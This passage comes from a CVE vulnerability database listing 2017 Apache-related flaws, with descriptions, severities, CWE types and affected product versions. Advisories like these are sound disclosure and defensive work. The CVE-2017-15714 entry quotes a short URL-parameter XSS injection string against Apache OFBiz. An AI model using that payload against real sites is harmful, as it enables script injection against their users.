apache tomcat 8.5.18
apache tomcat 7.0.3
apache tomcat 7.0.40
oracle micros_retail_xbri_loss_prevention 10.7.0
oracle retail_returns_management 14.1.3
apache tomcat 7.0.72
apache tomcat 9.0.0
redhat enterprise_linux_for_power_big_endian 6.0_ppc64
oracle retail_price_management 13.1
redhat enterprise_linux_workstation 6.0
oracle retail_price_management 16.0
oracle retail_xstore_point_of_service 15.0.1
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 8.0.40
oracle retail_order_management_system 5.0
apache tomcat 7.0.77
apache tomcat 7.0.36
apache tomcat 7.0.57
redhat enterprise_linux_server_tus 7.6
apache tomcat 7.0.38
oracle retail_insights 14.1
oracle retail_order_management_system 4.5
apache tomcat 7.0.9
apache tomcat 7.0.18
oracle retail_store_inventory_management 13.0.7
apache tomcat 7.0.7
oracle transportation_management 6.3.6
apache tomcat 7.0.34
oracle retail_invoice_matching 13.2
oracle micros_retail_xbri_loss_prevention 10.5.0
redhat enterprise_linux_server_aus 7.6
oracle retail_order_broker 15.0
redhat enterprise_linux_for_ibm_z_systems_eus 7.4_s390x
oracle enterprise_manager_for_mysql_database 12.1.0.4.0
apache tomcat 7.0.45
apache tomcat 8.0.10
canonical ubuntu_linux 17.10
apache tomcat 7.0.27
oracle transportation_management 6.3.7
redhat enterprise_linux_for_power_big_endian_eus 7.4_ppc64
oracle retail_convenience_and_fuel_pos_software 2.1.132
redhat enterprise_linux_for_ibm_z_systems 6.0_s390x
apache tomcat 8.5.20
apache tomcat 7.0.69
apache tomcat 8.0.13
apache tomcat 8.5.16
apache tomcat 8.0.31
oracle communications_instant_messaging_server 10.0.1
oracle instantis_enterprisetrack 17.2
apache tomcat 8.0.27
apache tomcat 8.5.1
redhat enterprise_linux_eus_compute_node 7.5
oracle health_sciences_empirica_inspections 1.0.1.1
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 7.0.56
apache tomcat 8.5.15
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 7.0.12
apache tomcat 8.0.37
oracle transportation_management 6.3.1
redhat enterprise_linux_server_tus 7.4
oracle transportation_management 6.3.4
apache tomcat 7.0.50
oracle micros_retail_xbri_loss_prevention 10.8.1
apache tomcat 7.0.60
apache tomcat 7.0.28
redhat enterprise_linux_for_power_big_endian_eus 7.6_ppc64
redhat enterprise_linux_for_power_little_endian_eus 7.7_ppc64le
oracle retail_order_broker 5.0
apache tomcat 8.5.6
apache tomcat 7.0.21
oracle retail_eftlink 1.1.124
apache tomcat 8.0.23
oracle micros_retail_xbri_loss_prevention 10.6.0
apache tomcat 8.5.8
oracle retail_advanced_inventory_planning 13.2
oracle endeca_information_discovery_integrator 3.2.0
apache tomcat 7.0.65
redhat enterprise_linux_eus_compute_node 7.4
redhat enterprise_linux_server_tus 7.7
apache tomcat 7.0.11
apache tomcat 7.0.16
redhat jboss_enterprise_web_server 2.0.0
oracle retail_price_management 14.1
oracle retail_invoice_matching 12.0
apache tomcat 8.5.0
apache tomcat 7.0.70
oracle retail_invoice_matching 13.0
oracle retail_insights 14.0
apache tomcat 8.0.34
apache tomcat 8.0.43
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.35
oracle retail_insights 15.0
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
redhat enterprise_linux_eus 7.4
apache tomcat 7.0.46
oracle agile_plm 9.3.5
oracle mysql_enterprise_monitor *
apache tomcat 8.0.9
redhat enterprise_linux_for_power_little_endian_eus 7.6_ppc64le
oracle retail_invoice_matching 13.1
apache tomcat 8.0.41
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.7
apache tomcat 8.5.10
apache tomcat 7.0.49
oracle agile_plm 9.3.4
oracle retail_returns_management 2.3.8
apache tomcat 8.5.12
apache tomcat 8.0.1
oracle endeca_information_discovery_integrator 3.1.0
netapp oncommand_shift -
apache tomcat 7.0.10
apache tomcat 7.0.66
oracle retail_central_office 14.1.3
apache tomcat 8.5.13
apache tomcat 8.0.38
apache tomcat 7.0.76
apache tomcat 7.0.2
oracle transportation_management 6.3.2
apache tomcat 8.0.28
apache tomcat 7.0.63
redhat enterprise_linux_for_ibm_z_systems 7.0_s390x
apache tomcat 8.0.2
oracle retail_invoice_matching 15.0
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2017-12618 LOW

Apache Portable Runtime Utility (APR-util) 1.6.0 and prior fail to validate the integrity of SDBM database files used by apr_sdbm*() functions, resulting in a possible out of bound read access. A local user with write access to the database can make a program or process using these functions crash, and cause a denial of service.

CVSS 2.0

Severity: LOW

Problem Type: CWE-125,

Products Affected

Vendor Product Version
apache portable_runtime_utility 0.9.2
apache portable_runtime_utility 1.2.1
apache portable_runtime_utility 1.4.3
apache portable_runtime_utility 1.1.0
apache portable_runtime_utility 1.2.8
apache portable_runtime_utility 0.9.6
apache portable_runtime_utility 1.3.7
apache portable_runtime_utility 1.3.1
apache portable_runtime_utility 1.5.5
apache portable_runtime_utility 1.4.0
apache portable_runtime_utility 0.9.18
apache portable_runtime_utility 1.2.7
apache portable_runtime_utility 0.9.14
apache portable_runtime_utility 1.3.3
apache portable_runtime_utility 0.9.20
apache portable_runtime_utility 1.3.5
apache portable_runtime_utility 1.1.2
apache portable_runtime_utility 0.9.9
apache portable_runtime_utility 1.0.2
apache portable_runtime_utility 1.0.1
apache portable_runtime_utility 1.0.0
apache portable_runtime_utility 1.3.8
apache portable_runtime_utility 0.9.19
apache portable_runtime_utility 1.2.13
apache portable_runtime_utility 1.5.4
apache portable_runtime_utility 0.9.13
apache portable_runtime_utility 1.2.12
apache portable_runtime_utility 0.9.1
apache portable_runtime_utility 1.2.9
apache portable_runtime_utility 0.9.5
apache portable_runtime_utility 1.3.0
apache portable_runtime_utility 1.3.9
apache portable_runtime_utility 0.9.16
apache portable_runtime_utility 0.9.3
apache portable_runtime_utility 1.3.10
apache portable_runtime_utility 0.9.12
apache portable_runtime_utility 0.9.17
apache portable_runtime_utility 1.3.6
apache portable_runtime_utility 1.4.2
apache portable_runtime_utility 1.2.6
apache portable_runtime_utility 1.3.13
apache portable_runtime_utility 1.5.2
apache portable_runtime_utility 1.3.2
apache portable_runtime_utility 0.9.4
apache portable_runtime_utility 1.1.1
apache portable_runtime_utility 1.2.10
apache portable_runtime_utility 1.5.1
apache portable_runtime_utility 1.4.1
apache portable_runtime_utility 0.9.11
apache portable_runtime_utility 0.9.15
apache portable_runtime_utility 1.6.0
apache portable_runtime_utility 1.3.4
apache portable_runtime_utility 1.3.11
apache portable_runtime_utility 1.2.2
apache portable_runtime_utility 1.3.12
apache portable_runtime_utility 1.5.0
apache portable_runtime_utility 0.9.10
apache portable_runtime_utility 0.9.7
apache portable_runtime_utility 1.5.3
CVE-2017-12619 MEDIUM

Apache Zeppelin prior to 0.7.3 was vulnerable to session fixation which allowed an attacker to hijack a valid user session. Issue was reported by "stone lone".

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-384,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2017-12620 HIGH

When loading models or dictionaries that contain XML it is possible to perform an XXE attack, since Apache OpenNLP is a library, this only affects applications that load models or dictionaries from untrusted sources. The versions 1.5.0 to 1.5.3, 1.6.0, 1.7.0 to 1.7.2, 1.8.0 to 1.8.1 of Apache OpenNLP are affected.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache opennlp 1.8.0
apache opennlp 1.5.1
apache opennlp 1.7.0
apache opennlp 1.8.1
apache opennlp 1.5.0
apache opennlp 1.5.3
apache opennlp 1.7.1
apache opennlp 1.6.0
apache opennlp 1.5.2
apache opennlp 1.7.2
CVE-2017-12621 HIGH

During Jelly (xml) file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity (XXE) attacks in Apache Commons Jelly before 1.0.1.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache commons_jelly *
CVE-2017-12622 MEDIUM

When an Apache Geode cluster before v1.3.0 is operating in secure mode and an authenticated user connects to a Geode cluster using the gfsh tool with HTTP, the user is able to obtain status information and control cluster members even without CLUSTER:MANAGE privileges.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-12623 MEDIUM

An authorized user could upload a template which contained malicious code and accessed sensitive files via an XML External Entity (XXE) attack. The fix to properly handle XML External Entities was applied on the Apache NiFi 1.4.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache nifi 1.0.0
apache nifi 1.0.1
apache nifi 1.3.0
apache nifi 1.1.2
apache nifi 1.2.0
apache nifi 1.1.1
apache nifi 1.1.0
CVE-2017-12624 MEDIUM

Apache CXF supports sending and receiving attachments via either the JAX-WS or JAX-RS specifications. It is possible to craft a message attachment header that could lead to a Denial of Service (DoS) attack on a CXF web service provider. Both JAX-WS and JAX-RS services are vulnerable to this attack. From Apache CXF 3.2.1 and 3.1.14, message attachment headers that are greater than 300 characters will be rejected by default. This value is configurable via the property "attachment-max-header-size".

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cxf *
CVE-2017-12625 MEDIUM

Apache Hive 2.1.x before 2.1.2, 2.2.x before 2.2.1, and 2.3.x before 2.3.1 expose an interface through which masking policies can be defined on tables or views, e.g., using Apache Ranger. When a view is created over a given table, the policy enforcement does not happen correctly on the table for masked columns.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hive 2.3.0
apache hive 2.2.0
apache hive 2.1.1
apache hive 2.1.0
CVE-2017-12626 MEDIUM

Apache POI in versions prior to release 3.17 are vulnerable to Denial of Service Attacks: 1) Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294), and 2) Out of Memory Exceptions while parsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache poi *
CVE-2017-12627 HIGH

In Apache Xerces-C XML Parser library before 3.2.1, processing of external DTD paths can result in a null pointer dereference under certain conditions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache xerces-c++ *
CVE-2017-12628 HIGH

The JMX server embedded in Apache James, also used by the command line client is exposed to a java de-serialization issue, and thus can be used to execute arbitrary commands. As James exposes JMX socket by default only on local-host, this vulnerability can only be used for privilege escalation. Release 3.0.1 upgrades the incriminated library.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache james_server *
CVE-2017-12629 HIGH

Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
canonical ubuntu_linux 16.04
redhat jboss_enterprise_application_platform 7.0.0
debian debian_linux 9.0
debian debian_linux 7.0
redhat jboss_enterprise_application_platform 7.1.0
apache solr *
debian debian_linux 8.0
CVE-2017-12630 LOW

In Apache Drill 1.11.0 and earlier when submitting form from Query page users are able to pass arbitrary script or HTML which will take effect on Profile page afterwards. Example: after submitting special script that returns cookie information from Query page, malicious user may obtain this information from Profile page afterwards.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache drill *
CVE-2017-12631 MEDIUM

Apache CXF Fediz ships with a number of container-specific plugins to enable WS-Federation for applications. A CSRF (Cross Style Request Forgery) style vulnerability has been found in the Spring 2, Spring 3 and Spring 4 plugins in versions before 1.4.3 and 1.3.3. The vulnerability can result in a security context that is set up using a malicious client's roles for the given enduser.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache cxf_fediz *
apache cxf_fediz 1.4.0
apache cxf_fediz 1.4.1
apache cxf_fediz 1.4.2
CVE-2017-12632 MEDIUM

A malicious host header in an incoming HTTP request could cause NiFi to load resources from an external server. The fix to sanitize host headers and compare to a controlled whitelist was applied on the Apache NiFi 1.5.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache nifi *
CVE-2017-12633 HIGH

The camel-hessian component in Apache Camel 2.x before 2.19.4 and 2.20.x before 2.20.1 is vulnerable to Java object de-serialisation vulnerability. De-serializing untrusted data can lead to security flaws.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache camel *
CVE-2017-12634 HIGH

The camel-castor component in Apache Camel 2.x before 2.19.4 and 2.20.x before 2.20.1 is vulnerable to Java object de-serialisation vulnerability. De-serializing untrusted data can lead to security flaws.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache camel 2.20.0
apache camel *
CVE-2017-12635 HIGH

Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-269,

Products Affected

Vendor Product Version
apache couchdb *
apache couchdb 2.0.0
CVE-2017-12636 HIGH

CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache couchdb *
apache couchdb 2.0.0
CVE-2017-15691 MEDIUM

In Apache uimaj prior to 2.10.2, Apache uimaj 3.0.0-xxx prior to 3.0.0-beta, Apache uima-as prior to 2.10.2, Apache uimaFIT prior to 2.4.0, Apache uimaDUCC prior to 2.2.2, this vulnerability relates to an XML external entity expansion (XXE) capability of various XML parsers. UIMA as part of its configuration and operation may read XML from various sources, which could be tainted in ways to cause inadvertent disclosure of local files or other internal content.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache uimaj 3.0.0
apache uimaducc *
apache uimafit *
apache uima-as *
apache uimaj *
CVE-2017-15692 HIGH

In Apache Geode before v1.4.0, the TcpServer within the Geode locator opens a network port that deserializes data. If an unprivileged user gains access to the Geode locator, they may be able to cause remote code execution if certain classes are present on the classpath.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-15693 MEDIUM

In Apache Geode before v1.4.0, the Geode server stores application objects in serialized form. Certain cluster operations and API invocations cause these objects to be deserialized. A user with DATA:WRITE access to the cluster may be able to cause remote code execution if certain classes are present on the classpath.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-15694 MEDIUM

When an Apache Geode server versions 1.0.0 to 1.8.0 is operating in secure mode, a user with write permissions for specific data regions can modify internal cluster metadata. A malicious user could modify this data in a way that affects the operation of the cluster.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-88,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-15695 MEDIUM

When an Apache Geode server versions 1.0.0 to 1.4.0 is configured with a security manager, a user with DATA:WRITE privileges is allowed to deploy code by invoking an internal Geode function. This allows remote code execution. Code deployment should be restricted to users with DATA:MANAGE privilege.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-15696 MEDIUM

When an Apache Geode cluster before v1.4.0 is operating in secure mode, the Geode configuration service does not properly authorize configuration requests. This allows an unprivileged user who gains access to the Geode locator to extract configuration data and previously deployed application code.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-15697 HIGH

A malicious X-ProxyContextPath or X-Forwarded-Context header containing external resources or embedded code could cause remote code execution. The fix to properly handle these headers was applied on the Apache NiFi 1.5.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache nifi *
CVE-2017-15698 MEDIUM

When parsing the AIA-Extension field of a client certificate, Apache Tomcat Native Connector 1.2.0 to 1.2.14 and 1.1.23 to 1.1.34 did not correctly handle fields longer than 127 bytes. The result of the parsing error was to skip the OCSP check. It was therefore possible for client certificates that should have been rejected (if the OCSP check had been made) to be accepted. Users not using OCSP checks are not affected by this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache tomcat_native *
debian debian_linux 9.0
debian debian_linux 8.0
CVE-2017-15699 MEDIUM

A Denial of Service vulnerability was found in Apache Qpid Dispatch Router versions 0.7.0 and 0.8.0. To exploit this vulnerability, a remote user must be able to establish an AMQP connection to the Qpid Dispatch Router and send a specifically crafted AMQP frame which will cause it to segfault and shut down.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache qpid_dispatch 0.7.0
apache qpid_dispatch 0.8.0
CVE-2017-15700 MEDIUM

A flaw in the org.apache.sling.auth.core.AuthUtil#isRedirectValid method in Apache Sling Authentication Service 1.4.0 allows an attacker, through the Sling login form, to trick a victim to send over their credentials.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache sling_authentication_service 1.4.0
CVE-2017-15701 MEDIUM

In Apache Qpid Broker-J versions 6.1.0 through 6.1.4 (inclusive) the broker does not properly enforce a maximum frame size in AMQP 1.0 frames. A remote unauthenticated attacker could exploit this to cause the broker to exhaust all available memory and eventually terminate. Older AMQP protocols are not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache qpid_broker-j *
CVE-2017-15702 HIGH

In Apache Qpid Broker-J 0.18 through 0.32, if the broker is configured with different authentication providers on different ports one of which is an HTTP port, then the broker can be tricked by a remote unauthenticated attacker connecting to the HTTP port into using an authentication provider that was configured on a different port. The attacker still needs valid credentials with the authentication provider on the spoofed port. This becomes an issue when the spoofed port has weaker authentication protection (e.g., anonymous access, default accounts) and is normally protected by firewall rules or similar which can be circumvented by this vulnerability. AMQP ports are not affected. Versions 6.0.0 and newer are not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache qpid_broker-j *
CVE-2017-15703 LOW

Any authenticated user (valid client certificate but without ACL permissions) could upload a template which contained malicious code and caused a denial of service via Java deserialization attack. The fix to properly handle Java deserialization was applied on the Apache NiFi 1.4.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: LOW

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache nifi *
CVE-2017-15705 MEDIUM

A denial of service vulnerability was identified that exists in Apache SpamAssassin before 3.4.2. The vulnerability arises with certain unclosed tags in emails that cause markup to be handled incorrectly leading to scan timeouts. In Apache SpamAssassin, using HTML::Parser, we setup an object and hook into the begin and end tag event handlers In both cases, the "open" event is immediately followed by a "close" event - even if the tag *does not* close in the HTML being parsed. Because of this, we are missing the "text" event to deal with the object normally. This can cause carefully crafted emails that might take more scan time than expected leading to a Denial of Service. The issue is possibly a bug or design decision in HTML::Parser that specifically impacts the way Apache SpamAssassin uses the module with poorly formed html. The exploit has been seen in the wild but not believed to have been purposefully part of a Denial of Service attempt. We are concerned that there may be attempts to abuse the vulnerability in the future.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache spamassassin *
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
canonical ubuntu_linux 14.04
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_workstation 7.0
debian debian_linux 8.0
redhat enterprise_linux_server 7.0
CVE-2017-15706 MEDIUM

As part of the fix for bug 61201, the documentation for Apache Tomcat 9.0.0.M22 to 9.0.1, 8.5.16 to 8.5.23, 8.0.45 to 8.0.47 and 7.0.79 to 7.0.82 included an updated description of the search algorithm used by the CGI Servlet to identify which script to execute. The update was not correct. As a result, some scripts may have failed to execute as expected and other scripts may have been executed unexpectedly. Note that the behaviour of the CGI servlet has remained unchanged in this regard. It is only the documentation of the behaviour that was wrong and has been corrected.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-358,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
apache tomcat 9.0.1
CVE-2017-15707 MEDIUM

In Apache Struts 2.5 to 2.5.14, the REST Plugin is using an outdated JSON-lib library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted JSON payload.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts *
oracle financial_services_hedge_management_and_ifrs_valuations 8.0.5
netapp oncommand_balance -
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 7.1.6
oracle enterprise_manager_for_virtualization 13.2.3
oracle retail_xstore_point_of_service 7.0.6
oracle agile_plm_framework 9.3.6
oracle weblogic_server 12.2.1.2
oracle enterprise_manager_for_virtualization 13.2.2
oracle global_lifecycle_management_opatchauto *
oracle jd_edwards_enterpriseone_tools 9.2
oracle financial_services_hedge_management_and_ifrs_valuations 8.0.4
oracle webcenter_portal 12.2.1.2.0
oracle retail_xstore_point_of_service 16.0.2
oracle financial_services_market_risk_measurement_and_management 8.0.5
oracle retail_xstore_point_of_service 6.5.11
oracle retail_order_broker 5.2
oracle retail_xstore_point_of_service 15.0.1
oracle weblogic_server 12.2.1.3
CVE-2017-15708 HIGH

In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache synapse 1.1.2
apache synapse 1.1
apache synapse 1.1.1
apache synapse 2.0.0
oracle financial_services_market_risk_measurement_and_management 8.0.8
oracle peoplesoft_enterprise_peopletools 8.56
oracle financial_services_market_risk_measurement_and_management 8.0.6
apache synapse 2.1.0
apache synapse 1.2
apache synapse 3.0.0
apache synapse 1.0
oracle peoplesoft_enterprise_peopletools 8.57
CVE-2017-15709 MEDIUM

When using the OpenWire protocol in ActiveMQ versions 5.14.0 to 5.15.2 it was found that certain system details (such as the OS and kernel version) are exposed as plain text.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache activemq *
CVE-2017-15710 MEDIUM

In Apache httpd 2.0.23 to 2.0.65, 2.2.0 to 2.2.34, and 2.4.0 to 2.4.29, mod_authnz_ldap, if configured with AuthLDAPCharsetConfig, uses the Accept-Language header value to lookup the right charset encoding when verifying the user's credentials. If the header value is not present in the charset conversion table, a fallback mechanism is used to truncate it to a two characters value to allow a quick retry (for example, 'en-US' is truncated to 'en'). A header value of less than two characters forces an out of bound write of one NUL byte to a memory location that is not part of the string. In the worst case, quite unlikely, the process would crash which could be used as a Denial of Service attack. In the more likely case, this memory is already reserved for future use and the issue has no effect at all.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache http_server 2.4.7
canonical ubuntu_linux 18.04
netapp storage_automation_store -
netapp santricity_cloud_connector -
apache http_server 2.4.28
apache http_server 2.4.2
netapp clustered_data_ontap -
apache http_server 2.4.18
redhat enterprise_linux 6.0
apache http_server 2.4.3
apache http_server 2.4.26
apache http_server 2.4.10
canonical ubuntu_linux 12.04
apache http_server 2.4.1
redhat enterprise_linux 7.4
apache http_server 2.4.17
canonical ubuntu_linux 14.04
netapp storagegrid -
apache http_server 2.4.25
debian debian_linux 9.0
debian debian_linux 7.0
apache http_server 2.4.23
apache http_server 2.4.6
apache http_server 2.4.20
apache http_server 2.4.12
debian debian_linux 8.0
canonical ubuntu_linux 17.10
apache http_server 2.4.4
apache http_server 2.4.16
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
canonical ubuntu_linux 16.04
apache http_server 2.4.29
apache http_server 2.4.9
apache http_server 2.4.27
redhat enterprise_linux 7.6
CVE-2017-15712 MEDIUM

Vulnerability allows a user of Apache Oozie 3.1.3-incubating to 4.3.0 and 5.0.0-beta1 to expose private files on the Oozie server process. The malicious user can construct a workflow XML file containing XML directives and configuration that reference sensitive files on the Oozie server host.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache oozie 4.2.0
apache oozie 3.2.0
apache oozie 3.1.3
apache oozie 4.0.0
apache oozie 3.1.2
apache oozie 4.1.0
apache oozie 3.3.1
apache oozie 3.2
apache oozie 3.3.2
apache oozie 4.0.1
apache oozie 4.3.0
apache oozie 5.0.0
apache oozie 3.3.0
CVE-2017-15713 MEDIUM

Vulnerability in Apache Hadoop 0.23.x, 2.x before 2.7.5, 2.8.x before 2.8.3, and 3.0.0-alpha through 3.0.0-beta1 allows a cluster user to expose private files owned by the user running the MapReduce job history server process. The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hadoop 2.0.4
apache hadoop 2.0.5
apache hadoop 2.1.0
apache hadoop 2.0.0
apache hadoop 2.0.6
apache hadoop 2.0.3
apache hadoop 2.1.1
apache hadoop 2.0.2
apache hadoop 2.0.1
apache hadoop *
apache hadoop 3.0.0
CVE-2017-15714 HIGH

The BIRT plugin in Apache OFBiz 16.11.01 to 16.11.03 does not escape user input property passed. This allows for code injection by passing that code through the URL. For example by appending this code "__format=%27;alert(%27xss%27)" to the URL an alert window would execute.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache ofbiz 16.11.01
apache ofbiz 16.11.02
apache ofbiz 16.11.03
CVE-2017-15715 MEDIUM

In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.04
netapp storage_automation_store -
debian debian_linux 9.0
netapp santricity_cloud_connector -
netapp clustered_data_ontap -
debian debian_linux 8.0
canonical ubuntu_linux 17.10
redhat enterprise_linux 6.0
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
canonical ubuntu_linux 16.04
redhat enterprise_linux 7.4
canonical ubuntu_linux 14.04
redhat enterprise_linux 7.6
netapp storagegrid -
CVE-2017-15717 MEDIUM

A flaw in the way URLs are escaped and encoded in the org.apache.sling.xss.impl.XSSAPIImpl#getValidHref and org.apache.sling.xss.impl.XSSFilterImpl#isValidHref allows special crafted URLs to pass as valid, although they carry XSS payloads. The affected versions are Apache Sling XSS Protection API 1.0.4 to 1.0.18, Apache Sling XSS Protection API Compat 1.1.0 and Apache Sling XSS Protection API 2.0.0.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache sling_xss_protection_api 2.0.0
apache sling_xss_protection_api_compat 1.1.0
apache sling_xss_protection_api *
CVE-2017-15718 MEDIUM

The YARN NodeManager in Apache Hadoop 2.7.3 and 2.7.4 can leak the password for credential store provider used by the NodeManager to YARN Applications.

CVSS 2.0

